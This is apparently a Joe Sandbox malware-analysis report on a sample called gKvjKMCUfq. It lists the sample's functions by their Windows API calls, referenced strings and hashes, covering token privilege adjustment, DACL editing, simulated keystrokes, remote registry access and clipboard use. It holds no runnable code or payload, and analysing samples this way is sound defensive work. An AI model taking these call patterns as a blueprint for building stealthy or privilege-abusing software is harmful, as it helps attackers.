AttachThreadInput.USER32(?,00000000,00000001), ref: 007AD6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 007AD6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 007AD6CF
SetForegroundWindow.USER32(?), ref: 007AD6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 007AD6E7
keybd_event.USER32(00000012,00000000), ref: 007AD6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 007AD6FC
keybd_event.USER32(00000012,00000000), ref: 007AD701
MapVirtualKeyW.USER32(00000012,00000000), ref: 007AD70A
keybd_event.USER32(00000012,00000000), ref: 007AD70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 007AD719
keybd_event.USER32(00000012,00000000), ref: 007AD71E
SetForegroundWindow.USER32(?), ref: 007AD721
AttachThreadInput.USER32(?,?,00000000), ref: 007AD748

Strings

Shell_TrayWnd, xrefs: 007AD660

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 897c46fdbd20b5152d0622467743a629c3f7e4134999ef446c4ec4ef64b8ba13
Instruction ID: 83aef19270356c5ccfd51cf50e7fcc172d92f862fb7dcf4d515fb0959b5e0ca8
Opcode Fuzzy Hash: 897c46fdbd20b5152d0622467743a629c3f7e4134999ef446c4ec4ef64b8ba13
Instruction Fuzzy Hash: 16317571A40318BAEB206B619C89F7F7F6CEF45B50F108025FA05EA1D1CAB45D11EAA5

Function 007C8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 007C87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C882B
Part of subcall function 007C87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C8858
Part of subcall function 007C87E1: GetLastError.KERNEL32 ref: 007C8865

_memset.LIBCMT ref: 007C8353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007C83A5
CloseHandle.KERNEL32(?), ref: 007C83B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007C83CD
GetProcessWindowStation.USER32 ref: 007C83E6
SetProcessWindowStation.USER32(00000000), ref: 007C83F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007C840A

Part of subcall function 007C81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007C8309), ref: 007C81E0
Part of subcall function 007C81CB: CloseHandle.KERNEL32(?,?,007C8309), ref: 007C81F2

Strings

default, xrefs: 007C8405
winsta0, xrefs: 007C83C8
, xrefs: 007C8362

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 2e9ef703ddbb236aa1d7d752fb6f419283259d11a5154dd1f47283ec7acee528
Instruction ID: 6da6b24feb95adf5b8a98a620da1c8fbae4d96729d40d1abc51e51e512d0ac6b
Opcode Fuzzy Hash: 2e9ef703ddbb236aa1d7d752fb6f419283259d11a5154dd1f47283ec7acee528
Instruction Fuzzy Hash: 1F814A71900209AFDF519FA4DC49FEEBBB8EF04304F28816DF910A6261DB798A15DB25

Function 007DC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 007DC78D
FindClose.KERNEL32(00000000), ref: 007DC7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007DC806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007DC81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 007DC844
__swprintf.LIBCMT ref: 007DC890
__swprintf.LIBCMT ref: 007DC8D3

Part of subcall function 00777DE1: _memmove.LIBCMT ref: 00777E22

__swprintf.LIBCMT ref: 007DC927

Part of subcall function 00793698: __woutput_l.LIBCMT ref: 007936F1

__swprintf.LIBCMT ref: 007DC975

Part of subcall function 00793698: __flsbuf.LIBCMT ref: 00793713
Part of subcall function 00793698: __flsbuf.LIBCMT ref: 0079372B

__swprintf.LIBCMT ref: 007DC9C4
__swprintf.LIBCMT ref: 007DCA13
__swprintf.LIBCMT ref: 007DCA62

Strings

%4d, xrefs: 007DC8CD
%4d%02d%02d%02d%02d%02d, xrefs: 007DC88A
%02d, xrefs: 007DC91B, 007DC925, 007DC973, 007DC9C2, 007DCA11, 007DCA60

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: f775f13d169fbe49274b709c7e3c741aa2fe55804d6c1c80f12510ea9e8a66ec
Instruction ID: 7d112d01e741131b369eb29aa6db0c44eae4bb0ef23fa3d7fe3dcef02cf975e5
Opcode Fuzzy Hash: f775f13d169fbe49274b709c7e3c741aa2fe55804d6c1c80f12510ea9e8a66ec
Instruction Fuzzy Hash: 41A13EB1505305EBCB54EF94C889DAFB7ECFF94740F40492AF599C6251EA38DA08CB62

Function 007DEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007DEFB6
_wcscmp.LIBCMT ref: 007DEFCB
_wcscmp.LIBCMT ref: 007DEFE2
GetFileAttributesW.KERNEL32(?), ref: 007DEFF4
SetFileAttributesW.KERNEL32(?,?), ref: 007DF00E
FindNextFileW.KERNEL32(00000000,?), ref: 007DF026
FindClose.KERNEL32(00000000), ref: 007DF031
FindFirstFileW.KERNEL32(*.*,?), ref: 007DF04D
_wcscmp.LIBCMT ref: 007DF074
_wcscmp.LIBCMT ref: 007DF08B
SetCurrentDirectoryW.KERNEL32(?), ref: 007DF09D
SetCurrentDirectoryW.KERNEL32(00828920), ref: 007DF0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 007DF0C5
FindClose.KERNEL32(00000000), ref: 007DF0D2
FindClose.KERNEL32(00000000), ref: 007DF0E4

Strings

*.*, xrefs: 007DF048

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: f1d5bec1471d157ceb1559f2c0c774fc2ba573e23c58e797443f186d70a55049
Instruction ID: ed3a7ce059f93b7468768739760e54ae9b315dd05d6bfc0ba109bc33d3f93100
Opcode Fuzzy Hash: f1d5bec1471d157ceb1559f2c0c774fc2ba573e23c58e797443f186d70a55049
Instruction Fuzzy Hash: F931C332501218AADF149BB4EC48BEE77BCAF48360F144177E805D3291DF78DA84CA65

Function 007F0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F0953
RegCreateKeyExW.ADVAPI32(?,?,00000000,007FF910,00000000,?,00000000,?,?), ref: 007F09C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007F0A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007F0A92
RegCloseKey.ADVAPI32(?), ref: 007F0DB2
RegCloseKey.ADVAPI32(00000000), ref: 007F0DBF

Strings

REG_QWORD, xrefs: 007F0D00
REG_EXPAND_SZ, xrefs: 007F0A2F
REG_SZ, xrefs: 007F0AD0
REG_MULTI_SZ, xrefs: 007F0B7A
REG_DWORD, xrefs: 007F0C83
REG_BINARY, xrefs: 007F0D4D

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 9c5181d4dbd7c0bfa1f14f4fe4ea84b117fb586e43b24e65ef5a4f1708429bea
Instruction ID: a93964cd78a1ebe4c2f4b12b260ed5d98a929e450b8189374b8f970bb985d6ad
Opcode Fuzzy Hash: 9c5181d4dbd7c0bfa1f14f4fe4ea84b117fb586e43b24e65ef5a4f1708429bea
Instruction Fuzzy Hash: 7C022775600605DFCB14EF14C899A2AB7E5EF89324F048458FA999B362DB38EC41CB82

Function 007DF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007DF113
_wcscmp.LIBCMT ref: 007DF128
_wcscmp.LIBCMT ref: 007DF13F

Part of subcall function 007D4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007D43A0

FindNextFileW.KERNEL32(00000000,?), ref: 007DF16E
FindClose.KERNEL32(00000000), ref: 007DF179
FindFirstFileW.KERNEL32(*.*,?), ref: 007DF195
_wcscmp.LIBCMT ref: 007DF1BC
_wcscmp.LIBCMT ref: 007DF1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 007DF1E5
SetCurrentDirectoryW.KERNEL32(00828920), ref: 007DF203
FindNextFileW.KERNEL32(00000000,00000010), ref: 007DF20D
FindClose.KERNEL32(00000000), ref: 007DF21A
FindClose.KERNEL32(00000000), ref: 007DF22C

Strings

*.*, xrefs: 007DF190

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: b76649569fdab61c72bb51b26d8f1d6462692045ff67adcebdbef382c97f1d9f
Instruction ID: 767e757224bcf4f7127aad7f73c16c2f8368a0b2e38c071200e48b7be00c6188
Opcode Fuzzy Hash: b76649569fdab61c72bb51b26d8f1d6462692045ff67adcebdbef382c97f1d9f
Instruction Fuzzy Hash: C331F83650121DAADF109F74EC49EEE77BCAF49360F104176E811E2290DB39DE85CA58

Function 007DA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007DA20F
__swprintf.LIBCMT ref: 007DA231
CreateDirectoryW.KERNEL32(?,00000000), ref: 007DA26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007DA293
_memset.LIBCMT ref: 007DA2B2
_wcsncpy.LIBCMT ref: 007DA2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007DA323
CloseHandle.KERNEL32(00000000), ref: 007DA32E
RemoveDirectoryW.KERNEL32(?), ref: 007DA337
CloseHandle.KERNEL32(00000000), ref: 007DA341

Strings

:, xrefs: 007DA252
\, xrefs: 007DA247
\??\%s, xrefs: 007DA22B

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 253c2dd9b541a98fa3f148825a6923f6e72ef00464b928183ab61445a6d799ad
Instruction ID: b1875e2c65bad0c2839bd8bb753f17d8aa6b598237da301788d189a1e85391c1
Opcode Fuzzy Hash: 253c2dd9b541a98fa3f148825a6923f6e72ef00464b928183ab61445a6d799ad
Instruction Fuzzy Hash: 82318DB290010ABBDB219FA0DC49FEB37BDBF89740F1441B6F508D2260EB7896458B25

Function 007C7CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007C8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C821E
Part of subcall function 007C8202: GetLastError.KERNEL32(?,007C7CE2,?,?,?), ref: 007C8228
Part of subcall function 007C8202: GetProcessHeap.KERNEL32(00000008,?,?,007C7CE2,?,?,?), ref: 007C8237
Part of subcall function 007C8202: HeapAlloc.KERNEL32(00000000,?,007C7CE2,?,?,?), ref: 007C823E
Part of subcall function 007C8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C8255

Part of subcall function 007C829F: GetProcessHeap.KERNEL32(00000008,007C7CF8,00000000,00000000,?,007C7CF8,?), ref: 007C82AB
Part of subcall function 007C829F: HeapAlloc.KERNEL32(00000000,?,007C7CF8,?), ref: 007C82B2
Part of subcall function 007C829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007C7CF8,?), ref: 007C82C3

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007C7D13
_memset.LIBCMT ref: 007C7D28
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007C7D47
GetLengthSid.ADVAPI32(?), ref: 007C7D58
GetAce.ADVAPI32(?,00000000,?), ref: 007C7D95
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007C7DB1
GetLengthSid.ADVAPI32(?), ref: 007C7DCE
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007C7DDD
HeapAlloc.KERNEL32(00000000), ref: 007C7DE4
GetLengthSid.ADVAPI32(?,00000008,?), ref: 007C7E05
CopySid.ADVAPI32(00000000), ref: 007C7E0C
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007C7E3D
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007C7E63
SetUserObjectSecurity.USER32(?,00000004,?), ref: 007C7E77

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 2c390b63bed6fe76e17e71cda038039f840b8b943f155224a0c5425134ee0675
Instruction ID: f040cafa3a7cecf087354954febe31d616fba7c2751a9f33f475f5d458f8f7ad
Opcode Fuzzy Hash: 2c390b63bed6fe76e17e71cda038039f840b8b943f155224a0c5425134ee0675
Instruction Fuzzy Hash: B5610871904209EBDF149FA4DC89EAEBBB9FF04300F04816DE915A6291DF399A15CB64

Function 007866E1 Relevance: 20.9, Strings: 16, Instructions: 889COMMON

Download Yara Rule

Strings

UTF), xrefs: 007C10FA
LIMIT_MATCH=, xrefs: 007C1170
BSR_ANYCRLF), xrefs: 007C131E
ANY), xrefs: 007C12DE
CRLF), xrefs: 007C12C1
3cx, xrefs: 007868FF
NO_START_OPT), xrefs: 007C114F
NO_AUTO_POSSESS), xrefs: 007C112E
UTF16), xrefs: 007C10CF
_x, xrefs: 007C1465, 007C150C, 007C15B4
ANYCRLF), xrefs: 007C12FB
CR), xrefs: 007C1287
LF), xrefs: 007C12A4
UCP), xrefs: 007C110D
BSR_UNICODE), xrefs: 007C1338
LIMIT_RECURSION=, xrefs: 007C11FC

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID:
String ID: 3cx$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$_x
API String ID: 0-379136436
Opcode ID: f19e360eb7c2fd155cdb60221cd23ee4a3de16c144d4e71fe6f5ce76de3596d9
Instruction ID: fcc751f5f26307c1ccb2e23c008d684cd1ad5baa0728df45b71086a1ba0a8e0c
Opcode Fuzzy Hash: f19e360eb7c2fd155cdb60221cd23ee4a3de16c144d4e71fe6f5ce76de3596d9
Instruction Fuzzy Hash: B47272B5E00219DBDB14DF58D840BADB7B5FF45310F64816EE945EB281EB389D81CB90

Function 007D001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 007D0097
SetKeyboardState.USER32(?), ref: 007D0102
GetAsyncKeyState.USER32(000000A0), ref: 007D0122
GetKeyState.USER32(000000A0), ref: 007D0139
GetAsyncKeyState.USER32(000000A1), ref: 007D0168
GetKeyState.USER32(000000A1), ref: 007D0179
GetAsyncKeyState.USER32(00000011), ref: 007D01A5
GetKeyState.USER32(00000011), ref: 007D01B3
GetAsyncKeyState.USER32(00000012), ref: 007D01DC
GetKeyState.USER32(00000012), ref: 007D01EA
GetAsyncKeyState.USER32(0000005B), ref: 007D0213
GetKeyState.USER32(0000005B), ref: 007D0221

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: f9029c82fbb16a0771f770f871ae0b25f3e76479631fbb8582f67147459a8185
Instruction ID: ebfce6fbbcec03e3e2cc9e528c671a65062937ddb5c283f63ad9bc5518cff744
Opcode Fuzzy Hash: f9029c82fbb16a0771f770f871ae0b25f3e76479631fbb8582f67147459a8185
Instruction Fuzzy Hash: C151EA2090478869FB35DBA088547EABFB49F01380F48559FD5C6577C2DAAC9B8CC7E2

Function 007F03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 007F0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007EFDAD,?,?), ref: 007F0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F04AC

Part of subcall function 00779837: __itow.LIBCMT ref: 00779862
Part of subcall function 00779837: __swprintf.LIBCMT ref: 007798AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007F054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007F05E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007F0822
RegCloseKey.ADVAPI32(00000000), ref: 007F082F

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 6f021dc88134c2b0b623e802776c6d12d555f455e801128b02e2a386ebceabb2
Instruction ID: d2d30649936869087787052b10adad7b566c57645d2a345d72f7909567ccab7a
Opcode Fuzzy Hash: 6f021dc88134c2b0b623e802776c6d12d555f455e801128b02e2a386ebceabb2
Instruction Fuzzy Hash: D3E13C71604204EFCB14DF28C895E2ABBE5EF89754F04C56DF94ADB362DA34E901CB92

Function 007E83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00779837: __itow.LIBCMT ref: 00779862
Part of subcall function 00779837: __swprintf.LIBCMT ref: 007798AC

CoInitialize.OLE32 ref: 007E8403
CoUninitialize.OLE32 ref: 007E840E
CoCreateInstance.OLE32(?,00000000,00000017,00802BEC,?), ref: 007E846E
IIDFromString.OLE32(?,?), ref: 007E84E1
VariantInit.OLEAUT32(?), ref: 007E857B
VariantClear.OLEAUT32(?), ref: 007E85DC

Strings

NULL Pointer assignment, xrefs: 007E84B3
Failed to create object, xrefs: 007E8479, 007E852F
Invalid parameter, xrefs: 007E84FA

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: d5f271ae993c49b70e47258260eec4f5506abb1a04fd9b647f55142410ef7f91
Instruction ID: c6761ed711046fa877734a61e8a4c3364d19e8950a420f9d10f5707ba1d2e5b5
Opcode Fuzzy Hash: d5f271ae993c49b70e47258260eec4f5506abb1a04fd9b647f55142410ef7f91
Instruction Fuzzy Hash: 1661897060A392DFCB50DF15C848A6ABBE8EF4A754F044419F9899B291CF78ED44CB93

Function 007E4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 007E418B
EmptyClipboard.USER32 ref: 007E4191
GlobalAlloc.KERNEL32(00000002,?), ref: 007E41A6
CloseClipboard.USER32 ref: 007E4245

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 672c4fa778bedc81e5a698f4a7945068b6ffc2a8e2b6f45f87b7e4191ef4bf90
Instruction ID: aab64edd3a7d284fecdc3578ce18aa6d1ff46dfaffabedf224bcc36c7fe54b8d
Opcode Fuzzy Hash: 672c4fa778bedc81e5a698f4a7945068b6ffc2a8e2b6f45f87b7e4191ef4bf90
Instruction Fuzzy Hash: D4216D352012149FDB10AF65EC49B6E7BA8FF49751F10C02AFA46DB2A1DF38A801CB59

